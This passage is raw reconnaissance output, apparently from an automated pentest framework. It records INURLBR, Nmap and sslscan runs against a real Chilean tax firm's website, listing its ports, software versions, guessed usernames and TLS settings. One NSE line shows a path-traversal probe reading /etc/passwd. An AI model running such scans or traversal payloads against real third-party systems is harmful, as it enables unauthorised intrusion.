3004|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3005|_[ + ] More details:: / - / , ISP:
3006|_[ + ] Found:: UNIDENTIFIED
3007
3008 _[ - ]::--------------------------------------------------------------------------------------------------------------
3009|_[ + ] [ 28 / 56 ]-[07:05:14] [ - ]
3010|_[ + ] Target:: [ http://www.chilefa.cl/services/tax-law-reform/ ]
3011|_[ + ] Exploit::
3012|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3013|_[ + ] More details:: / - / , ISP:
3014|_[ + ] Found:: UNIDENTIFIED
3015
3016 _[ - ]::--------------------------------------------------------------------------------------------------------------
3017|_[ + ] [ 29 / 56 ]-[07:05:17] [ - ]
3018|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/mergers-and-acquisitions/ ]
3019|_[ + ] Exploit::
3020|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3021|_[ + ] More details:: / - / , ISP:
3022|_[ + ] Found:: UNIDENTIFIED
3023
3024 _[ - ]::--------------------------------------------------------------------------------------------------------------
3025|_[ + ] [ 30 / 56 ]-[07:05:20] [ - ]
3026|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/tax-law-reform/ ]
3027|_[ + ] Exploit::
3028|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3029|_[ + ] More details:: / - / , ISP:
3030|_[ + ] Found:: UNIDENTIFIED
3031
3032 _[ - ]::--------------------------------------------------------------------------------------------------------------
3033|_[ + ] [ 31 / 56 ]-[07:05:23] [ - ]
3034|_[ + ] Target:: [ http://www.chilefa.cl/315-2/our-team/ ]
3035|_[ + ] Exploit::
3036|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3037|_[ + ] More details:: / - / , ISP:
3038|_[ + ] Found:: UNIDENTIFIED
3039
3040 _[ - ]::--------------------------------------------------------------------------------------------------------------
3041|_[ + ] [ 32 / 56 ]-[07:05:25] [ - ]
3042|_[ + ] Target:: [ http://www.chilefa.cl/es/pt-tags/impuestos/ ]
3043|_[ + ] Exploit::
3044|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3045|_[ + ] More details:: / - / , ISP:
3046|_[ + ] Found:: UNIDENTIFIED
3047
3048 _[ - ]::--------------------------------------------------------------------------------------------------------------
3049|_[ + ] [ 33 / 56 ]-[07:05:28] [ - ]
3050|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/auditoria-2/ ]
3051|_[ + ] Exploit::
3052|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3053|_[ + ] More details:: / - / , ISP:
3054|_[ + ] Found:: UNIDENTIFIED
3055
3056 _[ - ]::--------------------------------------------------------------------------------------------------------------
3057|_[ + ] [ 34 / 56 ]-[07:05:31] [ - ]
3058|_[ + ] Target:: [ http://www.chilefa.cl/pt-sort-categ/services/ ]
3059|_[ + ] Exploit::
3060|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3061|_[ + ] More details:: / - / , ISP:
3062|_[ + ] Found:: UNIDENTIFIED
3063
3064 _[ - ]::--------------------------------------------------------------------------------------------------------------
3065|_[ + ] [ 35 / 56 ]-[07:05:33] [ - ]
3066|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/chile-audit/ ]
3067|_[ + ] Exploit::
3068|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3069|_[ + ] More details:: / - / , ISP:
3070|_[ + ] Found:: UNIDENTIFIED
3071
3072 _[ - ]::--------------------------------------------------------------------------------------------------------------
3073|_[ + ] [ 36 / 56 ]-[07:05:36] [ - ]
3074|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/tax-planning/ ]
3075|_[ + ] Exploit::
3076|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3077|_[ + ] More details:: / - / , ISP:
3078|_[ + ] Found:: UNIDENTIFIED
3079
3080 _[ - ]::--------------------------------------------------------------------------------------------------------------
3081|_[ + ] [ 37 / 56 ]-[07:05:39] [ - ]
3082|_[ + ] Target:: [ http://www.chilefa.cl/es/tag/income-tax-chile/ ]
3083|_[ + ] Exploit::
3084|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3085|_[ + ] More details:: / - / , ISP:
3086|_[ + ] Found:: UNIDENTIFIED
3087
3088 _[ - ]::--------------------------------------------------------------------------------------------------------------
3089|_[ + ] [ 38 / 56 ]-[07:05:42] [ - ]
3090|_[ + ] Target:: [ http://www.chilefa.cl/es/portfolio/gestion-de-riesgos/ ]
3091|_[ + ] Exploit::
3092|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3093|_[ + ] More details:: / - / , ISP:
3094|_[ + ] Found:: UNIDENTIFIED
3095
3096 _[ - ]::--------------------------------------------------------------------------------------------------------------
3097|_[ + ] [ 39 / 56 ]-[07:05:44] [ - ]
3098|_[ + ] Target:: [ http://www.chilefa.cl/pt-sort-categ/corporate-finance/ ]
3099|_[ + ] Exploit::
3100|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3101|_[ + ] More details:: / - / , ISP:
3102|_[ + ] Found:: UNIDENTIFIED
3103
3104 _[ - ]::--------------------------------------------------------------------------------------------------------------
3105|_[ + ] [ 40 / 56 ]-[07:05:47] [ - ]
3106|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/chilean-tax-regulation/ ]
3107|_[ + ] Exploit::
3108|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3109|_[ + ] More details:: / - / , ISP:
3110|_[ + ] Found:: UNIDENTIFIED
3111
3112 _[ - ]::--------------------------------------------------------------------------------------------------------------
3113|_[ + ] [ 41 / 56 ]-[07:05:50] [ - ]
3114|_[ + ] Target:: [ http://www.chilefa.cl/es/pt-tags/planificacion-tributaria/ ]
3115|_[ + ] Exploit::
3116|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3117|_[ + ] More details:: / - / , ISP:
3118|_[ + ] Found:: UNIDENTIFIED
3119
3120 _[ - ]::--------------------------------------------------------------------------------------------------------------
3121|_[ + ] [ 42 / 56 ]-[07:05:53] [ - ]
3122|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/jose-luis-aviles-munoz/ ]
3123|_[ + ] Exploit::
3124|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3125|_[ + ] More details:: / - / , ISP:
3126|_[ + ] Found:: UNIDENTIFIED
3127
3128 _[ - ]::--------------------------------------------------------------------------------------------------------------
3129|_[ + ] [ 43 / 56 ]-[07:05:56] [ - ]
3130|_[ + ] Target:: [ http://www.chilefa.cl/chilean-income-tax-return-ty-2018/ ]
3131|_[ + ] Exploit::
3132|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3133|_[ + ] More details:: / - / , ISP:
3134|_[ + ] Found:: UNIDENTIFIED
3135
3136 _[ - ]::--------------------------------------------------------------------------------------------------------------
3137|_[ + ] [ 44 / 56 ]-[07:05:59] [ - ]
3138|_[ + ] Target:: [ http://www.chilefa.cl/315-2/our-team/our-team/ ]
3139|_[ + ] Exploit::
3140|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3141|_[ + ] More details:: / - / , ISP:
3142|_[ + ] Found:: UNIDENTIFIED
3143
3144 _[ - ]::--------------------------------------------------------------------------------------------------------------
3145|_[ + ] [ 45 / 56 ]-[07:06:01] [ - ]
3146|_[ + ] Target:: [ http://www.chilefa.cl/pt-sort-categ/m-a-en/ ]
3147|_[ + ] Exploit::
3148|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3149|_[ + ] More details:: / - / , ISP:
3150|_[ + ] Found:: UNIDENTIFIED
3151
3152 _[ - ]::--------------------------------------------------------------------------------------------------------------
3153|_[ + ] [ 46 / 56 ]-[07:06:04] [ - ]
3154|_[ + ] Target:: [ http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/ ]
3155|_[ + ] Exploit::
3156|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3157|_[ + ] More details:: / - / , ISP:
3158|_[ + ] Found:: UNIDENTIFIED
3159
3160 _[ - ]::--------------------------------------------------------------------------------------------------------------
3161|_[ + ] [ 47 / 56 ]-[07:06:07] [ - ]
3162|_[ + ] Target:: [ http://www.chilefa.cl/tax-law-reform-in-the-year-2014/ ]
3163|_[ + ] Exploit::
3164|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3165|_[ + ] More details:: / - / , ISP:
3166|_[ + ] Found:: UNIDENTIFIED
3167
3168 _[ - ]::--------------------------------------------------------------------------------------------------------------
3169|_[ + ] [ 48 / 56 ]-[07:06:09] [ - ]
3170|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/ ]
3171|_[ + ] Exploit::
3172|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3173|_[ + ] More details:: / - / , ISP:
3174|_[ + ] Found:: UNIDENTIFIED
3175
3176 _[ - ]::--------------------------------------------------------------------------------------------------------------
3177|_[ + ] [ 49 / 56 ]-[07:06:12] [ - ]
3178|_[ + ] Target:: [ http://www.chilefa.cl/wp-content/themes/trymee/images/prettyPhoto/light_square/ ]
3179|_[ + ] Exploit::
3180|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.0 , IP:143.95.110.248:80
3181|_[ + ] More details:: / - / , ISP:
3182|_[ + ] Found:: UNIDENTIFIED
3183
3184 _[ - ]::--------------------------------------------------------------------------------------------------------------
3185|_[ + ] [ 50 / 56 ]-[07:06:15] [ - ]
3186|_[ + ] Target:: [ http://www.chilefa.cl/es/especial-derecho-tributario-en-el-ano-2014-3/ ]
3187|_[ + ] Exploit::
3188|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3189|_[ + ] More details:: / - / , ISP:
3190|_[ + ] Found:: UNIDENTIFIED
3191
3192 _[ - ]::--------------------------------------------------------------------------------------------------------------
3193|_[ + ] [ 51 / 56 ]-[07:06:18] [ - ]
3194|_[ + ] Target:: [ http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/ ]
3195|_[ + ] Exploit::
3196|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3197|_[ + ] More details:: / - / , ISP:
3198|_[ + ] Found:: UNIDENTIFIED
3199
3200 _[ - ]::--------------------------------------------------------------------------------------------------------------
3201|_[ + ] [ 52 / 56 ]-[07:06:21] [ - ]
3202|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/registro-de-empresas-de-auditoria-externa-reae/ ]
3203|_[ + ] Exploit::
3204|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3205|_[ + ] More details:: / - / , ISP:
3206|_[ + ] Found:: UNIDENTIFIED
3207
3208 _[ - ]::--------------------------------------------------------------------------------------------------------------
3209|_[ + ] [ 53 / 56 ]-[07:06:24] [ - ]
3210|_[ + ] Target:: [ http://www.chilefa.cl/tax-reform-income-tax-taxation-regimes-and-rates-for-commercial-year-2017/ ]
3211|_[ + ] Exploit::
3212|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3213|_[ + ] More details:: / - / , ISP:
3214|_[ + ] Found:: UNIDENTIFIED
3215
3216 _[ - ]::--------------------------------------------------------------------------------------------------------------
3217|_[ + ] [ 54 / 56 ]-[07:06:27] [ - ]
3218|_[ + ] Target:: [ http://www.chilefa.cl/law-20-720-of-insolvency-and-re-entrepreneurship-replacing-the-bankruptcy-law/ ]
3219|_[ + ] Exploit::
3220|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3221|_[ + ] More details:: / - / , ISP:
3222|_[ + ] Found:: UNIDENTIFIED
3223
3224 _[ - ]::--------------------------------------------------------------------------------------------------------------
3225|_[ + ] [ 55 / 56 ]-[07:06:30] [ - ]
3226|_[ + ] Target:: [ http://www.chilefa.cl/sii-publico-listado-de-150-paises-y-jurisdicciones-que-tienen-un-regimen-fiscal-preferencial/ ]
3227|_[ + ] Exploit::
3228|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3229|_[ + ] More details:: / - / , ISP:
3230|_[ + ] Found:: UNIDENTIFIED
3231
3232[ INFO ] [ Shutting down ]
3233[ INFO ] [ End of process INURLBR at [02-03-2020 07:06:30]
3234[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3235[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.chilefa.cl/output/inurlbr-www.chilefa.cl ]
3236|_________________________________________________________________________________________
3237
3238\_________________________________________________________________________________________/
3239######################################################################################################################################
3240Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:06 EST
3241NSE: Loaded 49 scripts for scanning.
3242NSE: Script Pre-scanning.
3243Initiating NSE at 07:06
3244Completed NSE at 07:06, 0.00s elapsed
3245Initiating NSE at 07:06
3246Completed NSE at 07:06, 0.00s elapsed
3247Initiating Ping Scan at 07:06
3248Scanning www.chilefa.cl (143.95.110.248) [4 ports]
3249Completed Ping Scan at 07:06, 0.38s elapsed (1 total hosts)
3250Initiating Parallel DNS resolution of 1 host. at 07:06
3251Completed Parallel DNS resolution of 1 host. at 07:06, 0.02s elapsed
3252Initiating SYN Stealth Scan at 07:06
3253Scanning www.chilefa.cl (143.95.110.248) [1 port]
3254Discovered open port 110/tcp on 143.95.110.248
3255Completed SYN Stealth Scan at 07:06, 0.35s elapsed (1 total ports)
3256Initiating Service scan at 07:06
3257Scanning 1 service on www.chilefa.cl (143.95.110.248)
3258Completed Service scan at 07:06, 0.67s elapsed (1 service on 1 host)
3259Initiating OS detection (try #1) against www.chilefa.cl (143.95.110.248)
3260Retrying OS detection (try #2) against www.chilefa.cl (143.95.110.248)
3261Initiating Traceroute at 07:06
3262Completed Traceroute at 07:06, 0.87s elapsed
3263Initiating Parallel DNS resolution of 19 hosts. at 07:06
3264Completed Parallel DNS resolution of 19 hosts. at 07:06, 2.53s elapsed
3265NSE: Script scanning 143.95.110.248.
3266Initiating NSE at 07:06
3267NSE Timing: About 68.66% done; ETC: 07:08 (0:00:30 remaining)
3268Completed NSE at 07:08, 90.23s elapsed
3269Initiating NSE at 07:08
3270Completed NSE at 07:08, 0.05s elapsed
3271Nmap scan report for www.chilefa.cl (143.95.110.248)
3272Host is up (0.40s latency).
3273rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
3274
3275PORT STATE SERVICE VERSION
3276110/tcp open pop3 Dovecot pop3d
3277|_pop3-capabilities: UIDL TOP AUTH-RESP-CODE CAPA STLS SASL(PLAIN LOGIN) RESP-CODES USER PIPELINING
3278Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3279Aggressive OS guesses: Grandstream GXV3275 video phone (91%), Linux 3.2 - 3.8 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Linux 2.6.18 - 2.6.22 (90%), Linux 3.3 (90%), MikroTik RouterOS 6.32.1 (90%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%), Linux 3.10 (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 2.6.39 (89%)
3280No exact OS matches for host (test conditions non-ideal).
3281Uptime guess: 269.173 days (since Fri Jun 7 03:58:37 2019)
3282Network Distance: 19 hops
3283TCP Sequence Prediction: Difficulty=260 (Good luck!)
3284IP ID Sequence Generation: All zeros
3285
3286TRACEROUTE (using port 443/tcp)
3287HOP RTT ADDRESS
32881 359.13 ms 10.202.8.1
32892 359.24 ms 185.32.222.3
32903 359.43 ms core02-40gb.datasource.ch (91.201.58.73)
32914 359.46 ms zch-b2-link.telia.net (62.115.180.122)
32925 359.50 ms ffm-bb2-link.telia.net (62.115.142.104)
32936 359.49 ms ffm-b5-link.telia.net (62.115.114.89)
32947 359.51 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
32958 359.57 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118)
32969 358.86 ms be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141)
329710 375.58 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
329811 375.66 ms be3043.ccr22.ymq01.atlas.cogentco.com (154.54.44.166)
329912 375.66 ms be3599.ccr21.alb02.atlas.cogentco.com (66.28.4.237)
330013 375.71 ms be2993.ccr21.cle04.atlas.cogentco.com (154.54.31.225)
330114 375.74 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
330215 499.77 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
330316 375.78 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)
330417 499.86 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238)
330518 499.86 ms 38.32.13.210
330619 254.83 ms ip-143-95-110-248.iplocal (143.95.110.248)
3307
3308NSE: Script Post-scanning.
3309Initiating NSE at 07:08
3310Completed NSE at 07:08, 0.00s elapsed
3311Initiating NSE at 07:08
3312Completed NSE at 07:08, 0.00s elapsed
3313######################################################################################################################################
3314Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:08 EST
3315NSE: Loaded 161 scripts for scanning.
3316NSE: Script Pre-scanning.
3317Initiating NSE at 07:08
3318Completed NSE at 07:08, 0.00s elapsed
3319Initiating NSE at 07:08
3320Completed NSE at 07:08, 0.00s elapsed
3321Initiating Parallel DNS resolution of 1 host. at 07:08
3322Completed Parallel DNS resolution of 1 host. at 07:08, 0.02s elapsed
3323Initiating SYN Stealth Scan at 07:08
3324Scanning www.chilefa.cl (143.95.110.248) [1 port]
3325Discovered open port 443/tcp on 143.95.110.248
3326Completed SYN Stealth Scan at 07:08, 0.30s elapsed (1 total ports)
3327Initiating Service scan at 07:08
3328Scanning 1 service on www.chilefa.cl (143.95.110.248)
3329Completed Service scan at 07:08, 14.08s elapsed (1 service on 1 host)
3330Initiating OS detection (try #1) against www.chilefa.cl (143.95.110.248)
3331Retrying OS detection (try #2) against www.chilefa.cl (143.95.110.248)
3332Initiating Traceroute at 07:09
3333Completed Traceroute at 07:09, 0.81s elapsed
3334Initiating Parallel DNS resolution of 19 hosts. at 07:09
3335Completed Parallel DNS resolution of 19 hosts. at 07:09, 2.52s elapsed
3336NSE: Script scanning 143.95.110.248.
3337Initiating NSE at 07:09
3338Completed NSE at 07:10, 90.14s elapsed
3339Initiating NSE at 07:10
3340Completed NSE at 07:10, 4.12s elapsed
3341Nmap scan report for www.chilefa.cl (143.95.110.248)
3342Host is up (0.44s latency).
3343rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
3344
3345PORT STATE SERVICE VERSION
3346443/tcp open ssl/http nginx 1.14.0
3347|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
3348| http-brute:
3349|_ Path "/" does not require authentication
3350|_http-chrono: Request times for /; avg: 1666.52ms; min: 1475.39ms; max: 1816.98ms
3351|_http-csrf: Couldn't find any CSRF vulnerabilities.
3352| http-default-accounts:
3353| [Arris 2307] at /logo_t.gif
3354|_ <blank>:<blank>
3355|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
3356|_http-dombased-xss: Couldn't find any DOM based XSS.
3357| http-errors:
3358| Spidering limited to: maxpagecount=40; withinhost=www.chilefa.cl
3359| Found the following error pages:
3360|
3361| Error Code: 403
3362|_ https://www.chilefa.cl:443/
3363|_http-feed: Couldn't find any feeds.
3364|_http-fetch: Please enter the complete path of the directory to save data in.
3365| http-grep:
3366| (1) http://www.chilefa.cl:443/:
3367| (1) email:
3368|_ + root@localhost.loca
3369| http-headers:
3370| Server: nginx/1.14.0
3371| Date: Mon, 02 Mar 2020 12:10:03 GMT
3372| Content-Type: text/html
3373| Transfer-Encoding: chunked
3374| Connection: close
3375| Accept-Ranges: bytes
3376|
3377|_ (Request type: GET)
3378|_http-jsonp-detection: Couldn't find any JSONP endpoints.
3379|_http-mobileversion-checker: No mobile version detected.
3380| http-security-headers:
3381| Strict_Transport_Security:
3382|_ HSTS not configured in HTTPS Server
3383|_http-server-header: nginx/1.14.0
3384| http-sitemap-generator:
3385| Directory structure:
3386| Longest directory structure:
3387| Depth: 0
3388| Dir: /
3389| Total files found (by extension):
3390|_
3391|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3392|_http-title: 403 Forbidden
3393| http-traceroute:
3394| HTML title
3395| Hop #1: 400 The plain HTTP request was sent to HTTPS port
3396| Hop #2: 403 Forbidden
3397| Hop #3: 403 Forbidden
3398| Status Code
3399| Hop #1: 400
3400| Hop #2: 403
3401| Hop #3: 403
3402| content-length
3403| Hop #1: 271
3404| Hop #2
3405|_ Hop #3
3406|_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
3407| http-vhosts:
3408| 69 names had status 403
3409|_58 names had status ERROR
3410| http-waf-detect: IDS/IPS/WAF detected:
3411|_www.chilefa.cl:443/?p4yl04d=../../../../../../../../../../../../../../../../../etc/passwd
3412|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
3413|_http-xssed: No previously reported XSS vuln.
3414Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3415Aggressive OS guesses: Grandstream GXV3275 video phone (91%), Linux 3.2 - 3.8 (91%), Linux 3.3 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Linux 2.6.18 - 2.6.22 (90%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%), MikroTik RouterOS 6.32.1 (89%), Linux 2.6.32 - 2.6.39 (89%), Linux 2.6.32 (89%), HP P2000 G3 NAS device (88%)
3416No exact OS matches for host (test conditions non-ideal).
3417Uptime guess: 269.175 days (since Fri Jun 7 03:58:38 2019)
3418Network Distance: 19 hops
3419TCP Sequence Prediction: Difficulty=256 (Good luck!)
3420IP ID Sequence Generation: All zeros
3421
3422TRACEROUTE (using port 443/tcp)
3423HOP RTT ADDRESS
34241 405.58 ms 10.202.8.1
34252 405.63 ms 185.32.222.3
34263 405.66 ms core02-40gb.datasource.ch (91.201.58.73)
34274 405.68 ms zch-b2-link.telia.net (62.115.180.122)
34285 405.75 ms ffm-bb2-link.telia.net (62.115.142.104)
34296 405.72 ms ffm-b5-link.telia.net (62.115.114.91)
34307 405.78 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
34318 253.98 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118)
34329 243.24 ms be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141)
343310 384.46 ms be2182.ccr21.lpl01.atlas.cogentco.com (154.54.77.246)
343411 263.48 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
343512 384.50 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
343613 384.52 ms be2993.ccr21.cle04.atlas.cogentco.com (154.54.31.225)
343714 384.54 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
343815 384.61 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
343916 384.58 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)
344017 384.64 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
344118 384.67 ms 38.32.13.210
344219 384.66 ms ip-143-95-110-248.iplocal (143.95.110.248)
3443
3444NSE: Script Post-scanning.
3445Initiating NSE at 07:10
3446Completed NSE at 07:10, 0.00s elapsed
3447Initiating NSE at 07:10
3448Completed NSE at 07:10, 0.00s elapsed
3449######################################################################################################################################
3450Version: 1.11.13-static
3451OpenSSL 1.0.2-chacha (1.0.2g-dev)
3452
3453Connected to 143.95.110.248
3454
3455Testing SSL server www.chilefa.cl on port 443 using SNI name www.chilefa.cl
3456
3457 TLS Fallback SCSV:
3458Server supports TLS Fallback SCSV
3459
3460 TLS renegotiation:
3461Secure session renegotiation supported
3462
3463 TLS Compression:
3464Compression disabled
3465
3466 Heartbleed:
3467TLS 1.2 not vulnerable to heartbleed
3468TLS 1.1 not vulnerable to heartbleed
3469TLS 1.0 not vulnerable to heartbleed
3470
3471 Supported Server Cipher(s):
3472Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
3473Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
3474Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3475Accepted TLSv1.2 256 bits AES256-GCM-SHA384
3476Accepted TLSv1.2 256 bits AES256-SHA256
3477Accepted TLSv1.2 256 bits AES256-SHA
3478Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
3479Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
3480Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3481Accepted TLSv1.2 128 bits AES128-GCM-SHA256
3482Accepted TLSv1.2 128 bits AES128-SHA256
3483Accepted TLSv1.2 128 bits AES128-SHA
3484Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3485Accepted TLSv1.2 112 bits DES-CBC3-SHA
3486Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3487Accepted TLSv1.1 256 bits AES256-SHA
3488Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3489Accepted TLSv1.1 128 bits AES128-SHA
3490Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3491Accepted TLSv1.1 112 bits DES-CBC3-SHA
3492Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3493Accepted TLSv1.0 256 bits AES256-SHA
3494Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3495Accepted TLSv1.0 128 bits AES128-SHA
3496Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3497Accepted TLSv1.0 112 bits DES-CBC3-SHA
3498
3499 SSL Certificate:
3500Signature Algorithm: sha256WithRSAEncryption
3501RSA Key Strength: 2048
3502
3503Subject: *.accountservergroup.com
3504Altnames: DNS:*.accountservergroup.com, DNS:accountservergroup.com
3505Issuer: Sectigo RSA Domain Validation Secure Server CA
3506
3507Not valid before: Aug 28 00:00:00 2019 GMT
3508Not valid after: Nov 29 00:00:00 2021 GMT
3509######################################################################################################################################
3510------------------------------------------------------------------------------------------------------------------------
3511
3512[ ! ] Starting SCANNER INURLBR 2.1 at [02-03-2020 07:11:57]
3513[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
3514It is the end user's responsibility to obey all applicable local, state and federal laws.
3515Developers assume no liability and are not responsible for any misuse or damage caused by this program
3516
3517[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.chilefa.cl/output/inurlbr-www.chilefa.cl ]
3518[ INFO ][ DORK ]::[ site:www.chilefa.cl ]
3519[ INFO ][ SEARCHING ]:: {
3520[ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ke ]
3521
3522[ INFO ][ SEARCHING ]::
3523-[:::]
3524[ INFO ][ ENGINE ]::[ GOOGLE API ]
3525
3526[ INFO ][ SEARCHING ]::
3527-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3528[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.tk ID: 006748068166572874491:55ez0c3j3ey ]
3529
3530[ INFO ][ SEARCHING ]::
3531-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3532
3533[ INFO ][ TOTAL FOUND VALUES ]:: [ 55 ]
3534
3535
3536 _[ - ]::--------------------------------------------------------------------------------------------------------------
3537|_[ + ] [ 0 / 55 ]-[07:12:19] [ - ]
3538|_[ + ] Target:: [ http://www.chilefa.cl/ ]
3539|_[ + ] Exploit::
3540|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3541|_[ + ] More details:: / - / , ISP:
3542|_[ + ] Found:: UNIDENTIFIED
3543
3544 _[ - ]::--------------------------------------------------------------------------------------------------------------
3545|_[ + ] [ 1 / 55 ]-[07:12:22] [ - ]
3546|_[ + ] Target:: [ http://www.chilefa.cl/315-2/ ]
3547|_[ + ] Exploit::
